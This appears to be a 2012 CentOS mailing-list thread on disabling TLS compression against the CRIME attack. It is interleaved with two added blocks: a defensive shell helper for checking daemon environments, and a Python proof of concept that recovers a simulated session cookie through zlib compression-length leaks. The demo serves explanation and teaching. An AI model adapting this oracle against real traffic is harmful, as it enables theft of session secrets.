09-24-2012, 11:07 AM
Markus Falb

SSL CRIME

Hi,
Some of you have heard of CRIME, probably.

from https://bugzilla.redhat.com/show_bug.cgi?id=857051
> Adding the following line to the /etc/sysconfig/httpd file:
>
> export OPENSSL_NO_DEFAULT_ZLIB=1

But there are other services but http that use ssl and are vulnerable?
What is the optimal place for setting this environment variable system wide?

I tried to set it in
/etc/profile.d/CRIME.sh
/etc/bashrc
without success.
--
Kind Regards, Markus Falb

_______________________________________________
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos
 
09-24-2012, 01:50 PM
Leon Fauster

SSL CRIME

On 24.09.2012 at 13:07 Markus Falb wrote:
> Hi,
> Some of you have heard of CRIME, probably.
>
> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>> Adding the following line to the /etc/sysconfig/httpd file:
>>
>> export OPENSSL_NO_DEFAULT_ZLIB=1
>
> But there are other services but http that use ssl and are vulnerable?
> What is the optimal place for setting this environment variable system wide?
>
> I tried to set it in
> /etc/profile.d/CRIME.sh
> /etc/bashrc
> without success.


The corresponding patch mentioned in the bz above could be adapted and the openssl package recompiled.

--
LF
 
09-24-2012, 08:26 PM
"Albert McCann"

SSL CRIME

> -----Original Message-----
> From: centos-bounces@centos.org [mailto:centos-bounces@centos.org] On
> Behalf Of Markus Falb
> Sent: Monday, September 24, 2012 7:07 AM
> To: centos@centos.org
> Subject: [CentOS] SSL CRIME
>
> Hi,
> Some of you have heard of CRIME, probably.
>
> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
> > Adding the following line to the /etc/sysconfig/httpd file:
> >
> > export OPENSSL_NO_DEFAULT_ZLIB=1
>
> But there are other services but http that use ssl and are vulnerable?
> What is the optimal place for setting this environment variable system
> wide?
>
> I tried to set it in
> /etc/profile.d/CRIME.sh
> /etc/bashrc
> without success.

What about placing it in the /etc/rc.d/rc.local file?

Al McCann
---
My computer was sold to me by Mad Man Muntz.

 
09-24-2012, 09:49 PM
Johnny Hughes

SSL CRIME

On 09/24/2012 06:07 AM, Markus Falb wrote:
> Hi,
> Some of you have heard of CRIME, probably.
>
> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>> Adding the following line to the /etc/sysconfig/httpd file:
>>
>> export OPENSSL_NO_DEFAULT_ZLIB=1
> But there are other services but http that use ssl and are vulnerable?
> What is the optimal place for setting this environment variable system wide?
>
> I tried to set it in
> /etc/profile.d/CRIME.sh
> /etc/bashrc
> without success.

The setting only matters if programs look for it and do something with
it ... so you would need to set it for the user that starts whatever
service you are trying to protect, if that daemon actually uses the
variable.

Just because a variable does something in httpd, that does not mean the
same variable means the same thing to sshd or any other daemon.

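Johnny's point above is the one to verify rather than assume: a daemon only sees the variable if it was in the environment of the process that started it, which on CentOS 5/6 means the init script's environment, not a login shell's. The helpers below are an added example, not code from the thread, from Red Hat or from CentOS. They assume the service's init script sources /etc/sysconfig/<service> (as httpd's does), a Linux /proc, and GNU sed/env; the function names are the example's own.

```shell
#!/bin/sh
# Added example (not from the thread). Three helpers for a CentOS 5/6 host:
#   add_sysconfig_export        put "export VAR=value" into the per-service
#                               /etc/sysconfig/<service> file the init script
#                               sources (assumption: it does, as httpd's does)
#   daemon_has_env              prove a running daemon really carries the
#                               variable, by reading /proc/<pid>/environ
#                               (Linux only; needs root or the daemon's uid)
#   tls_compression_negotiated  ask a TLS server whether it still negotiates
#                               compression, via openssl s_client

# Idempotent: adds the line once, or rewrites the value if it is already there.
# Restart the daemon afterwards; a running process keeps the environment it
# was started with.
add_sysconfig_export() {
    file=$1; var=$2; value=$3
    if grep -q "^export $var=" "$file" 2>/dev/null; then
        sed -i "s|^export $var=.*|export $var=$value|" "$file"
    else
        printf 'export %s=%s\n' "$var" "$value" >> "$file"
    fi
}

# daemon_has_env PID VAR        -> 0 if VAR is set in PID's environment
# daemon_has_env PID VAR VALUE  -> 0 only if VAR is set to exactly VALUE
daemon_has_env() {
    pid=$1; var=$2; want=${3-}
    environ=/proc/$pid/environ
    [ -r "$environ" ] || { echo "cannot read $environ" >&2; return 2; }
    if [ -n "$want" ]; then
        tr '\000' '\n' < "$environ" | grep -qxF -- "$var=$want"
    else
        tr '\000' '\n' < "$environ" | grep -q -- "^$var="
    fi
}

# Check every process of a service by name, e.g.
#   service_has_env httpd OPENSSL_NO_DEFAULT_ZLIB
# Prints one line per PID; non-zero exit if any process lacks the variable.
service_has_env() {
    name=$1; var=$2; rc=0
    for pid in $(pidof "$name"); do
        if daemon_has_env "$pid" "$var"; then
            echo "$name[$pid]: $var set"
        else
            echo "$name[$pid]: $var NOT set"; rc=1
        fi
    done
    return $rc
}

# tls_compression_negotiated HOST [PORT] -> prints s_client's "Compression:"
# line ("NONE" or "zlib compression"). Two caveats: the variable must be unset
# for the *client*, or the client itself never offers compression (hence
# env -u), and the client's OpenSSL must be built with zlib, otherwise "NONE"
# says nothing about the server.
tls_compression_negotiated() {
    host=$1; port=${2:-443}
    env -u OPENSSL_NO_DEFAULT_ZLIB openssl s_client -connect "$host:$port" \
        < /dev/null 2>/dev/null | grep '^Compression:'
}
```

The check to run after a restart is the /proc one: `service_has_env httpd OPENSSL_NO_DEFAULT_ZLIB` tells you whether the variable reached the daemon at all, and the s_client probe tells you whether compression is actually off on the wire, which is the property you care about.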
 
09-24-2012, 10:37 PM
Leon Fauster

SSL CRIME

On 24.09.2012 at 23:49 Johnny Hughes wrote:
> On 09/24/2012 06:07 AM, Markus Falb wrote:
>> Hi,
>> Some of you have heard of CRIME, probably.
>>
>> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>>> Adding the following line to the /etc/sysconfig/httpd file:
>>>
>>> export OPENSSL_NO_DEFAULT_ZLIB=1
>> But there are other services but http that use ssl and are vulnerable?
>> What is the optimal place for setting this environment variable system wide?
>>
>> I tried to set it in
>> /etc/profile.d/CRIME.sh
>> /etc/bashrc
>> without success.
>
> The setting only matters if programs look for it and do something with
> it ... so you would need to set it for the user that starts whatever
> service you are trying to protect, if that daemon actually uses the
> variable.
>
> Just because a variable does something in httpd, that does not mean the
> same variable means the same thing to sshd or any other daemon.

It's in openssl itself (rhel5/6):

http://pkgs.fedoraproject.org/cgit/openssl.git/tree/openssl-0.9.8j-env-nozlib.patch?id=1d20b5f2

IMO, the same as above would also apply to e.g. /etc/sysconfig/ldap ...

--
LF
 
09-25-2012, 12:45 PM
Markus Falb

SSL CRIME

On 25.9.2012 00:37, Leon Fauster wrote:
> On 24.09.2012 at 23:49 Johnny Hughes wrote:
>> On 09/24/2012 06:07 AM, Markus Falb wrote:
>>> Hi,
>>> Some of you have heard of CRIME, probably.
>>>
>>> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>>>> Adding the following line to the /etc/sysconfig/httpd file:
>>>>
>>>> export OPENSSL_NO_DEFAULT_ZLIB=1
>>> But there are other services but http that use ssl and are vulnerable?
>>> What is the optimal place for setting this environment variable system wide?
>>>
>>> I tried to set it in
>>> /etc/profile.d/CRIME.sh
>>> /etc/bashrc
>>> without success.
>>
>> The setting only matters if programs look for it and do something with
>> it ... so you would need to set it for the user that starts whatever
>> service you are trying to protect, if that daemon actually uses the
>> variable.
>>
>> Just because a variable does something in httpd, that does not mean the
>> same variable means the same thing to sshd or any other daemon.
>
> It's in openssl itself (rhel5/6):
>
> http://pkgs.fedoraproject.org/cgit/openssl.git/tree/openssl-0.9.8j-env-nozlib.patch?id=1d20b5f2
>
> IMO, the same as above would also apply to e.g. /etc/sysconfig/ldap ...

That was my understanding too. And instead of fixing X services I would
like to fix it for all services at once in one central location.

One could do it in /etc/init.d/functions maybe, but I doubt that it
would survive an update of initscripts.

Now that ssl compression has become security relevant, maybe the openssl
default should be changed. Default off, enabled only explicitly. Leon, I
know you suggested building a custom openssl package in an earlier
message, but to be honest, I am not very enthusiastic about maintaining
my own openssl. Maybe an upstream bugzilla should be filed.

Another related question: Which services are vulnerable to CRIME or the
concepts behind CRIME, and which services are not? Everyone is only
talking about http. For example I think that smtp is not vulnerable if
it does not support smtp auth, or maybe ftp is not vulnerable because it
uses a separate data channel, and so on...
--
Kind Regards, Markus Falb

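Which services are exposed to "the concepts behind CRIME" is easier to answer once the concept itself is on the table: the attacker needs chosen bytes compressed in the same context as a secret, plus a view of the resulting length, which encryption does not hide. The script below, an added example and not anything from the thread, reproduces that length oracle with zlib against a constructed HTTP request carrying a constructed cookie value; the request template, the secret, the guess alphabet and the padding bytes are all assumptions of the demo, as is the "two tries" comparison it uses to turn a sub-byte saving into a visible byte difference.

```python
"""
Added example (not from the thread): the CRIME length oracle, reduced to zlib.

Model: the victim's HTTP request carries a secret Cookie header, the attacker
controls the request path, and the whole request is compressed in one zlib
context before encryption. The attacker learns only len(compress(request)).
"""
import string
import zlib

SECRET_COOKIE = "sessionid=7f3a9c"     # constructed demo secret
KNOWN_PREFIX = "sessionid="            # the cookie name is public knowledge
ALPHABET = string.ascii_lowercase + string.digits


def victim_request(path: bytes, secret: str) -> bytes:
    """Request as the victim's client sends it: attacker-chosen path and the
    secret cookie share one compression context (constructed template)."""
    return (b"GET /" + path + b" HTTP/1.1\r\n"
            b"Host: example.com\r\n"
            b"Cookie: " + secret.encode() + b"\r\n\r\n")


def observed_len(path: bytes, secret: str) -> int:
    """What a network attacker sees: the compressed (then encrypted) size."""
    return len(zlib.compress(victim_request(path, secret)))


def guess_score(prefix: str, guess: str, secret: str, tries: int = 16) -> int:
    """'Two tries' oracle. A = prefix+guess+pad, B = prefix+pad+guess.
    If guess is the next secret byte, A's back-reference to the path is one
    byte longer than B's, so A needs fewer bits; if it is wrong, A and B hold
    exactly the same literals and matches and compress to the same size.
    The pad length is varied so a 7- or 8-bit saving crosses a byte boundary
    for some try. Pad bytes lie outside the alphabet and are >= 0x90, which
    cost 9 bits in deflate's fixed Huffman table and so shift the alignment.
    Returns sum over tries of len(B) - len(A): > 0 for a hit, 0 for a miss."""
    score = 0
    for k in range(tries):
        pad = bytes(range(0x90, 0x90 + k))        # k distinct bytes, no self-matches
        a = observed_len(prefix.encode() + guess.encode() + pad, secret)
        b = observed_len(prefix.encode() + pad + guess.encode(), secret)
        score += b - a
    return score


def recover_secret(secret: str, prefix: str = KNOWN_PREFIX,
                   alphabet: str = ALPHABET, max_len: int = 64) -> str:
    """Recover the secret byte by byte using only observed_len(). The secret
    is passed through solely so the victim side can build its request; the
    attacker logic never reads it."""
    recovered = prefix
    while len(recovered) < max_len:
        scores = {c: guess_score(recovered, c, secret) for c in alphabet}
        best = max(scores, key=scores.get)
        if scores[best] <= 0:      # nothing shortens the stream: end of secret
            break
        recovered += best
    return recovered


if __name__ == "__main__":
    got = recover_secret(SECRET_COOKIE)
    print("recovered:", got, "| correct:", got == SECRET_COOKIE)
```

Nothing in the oracle is HTTP-specific: the secret was never decrypted, only the effect of its bytes on the compressed length was observed. So for any other daemon the question is not which protocol it speaks but whether an attacker can get chosen plaintext into the same compressed stream as a secret and watch the record sizes; disabling TLS compression, which is what OPENSSL_NO_DEFAULT_ZLIB does for programs using the patched OpenSSL, removes the shared context.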
 
09-25-2012, 01:01 PM
Markus Falb

SSL CRIME

On 24.9.2012 22:26, Albert McCann wrote:
>> -----Original Message-----
>> From: centos-bounces@centos.org [mailto:centos-bounces@centos.org] On
>> Behalf Of Markus Falb
>> Sent: Monday, September 24, 2012 7:07 AM
>> To: centos@centos.org
>> Subject: [CentOS] SSL CRIME
>>
>> Hi,
>> Some of you have heard of CRIME, probably.
>>
>> from https://bugzilla.redhat.com/show_bug.cgi?id=857051
>>> Adding the following line to the /etc/sysconfig/httpd file:
>>>
>>> export OPENSSL_NO_DEFAULT_ZLIB=1
>>
>> But there are other services but http that use ssl and are vulnerable?
>> What is the optimal place for setting this environment variable system
>> wide?
>>
>> I tried to set it in
>> /etc/profile.d/CRIME.sh
>> /etc/bashrc
>> without success.
>
> What about placing it in the /etc/rc.d/rc.local file?

$ ls -l /etc/rc3.d/S99local
lrwxrwxrwx. 1 root root 11 18. Sep 09:08 /etc/rc3.d/S99local -> ../rc.local

It is too late, isn't it?
--
Kind Regards, Markus Falb
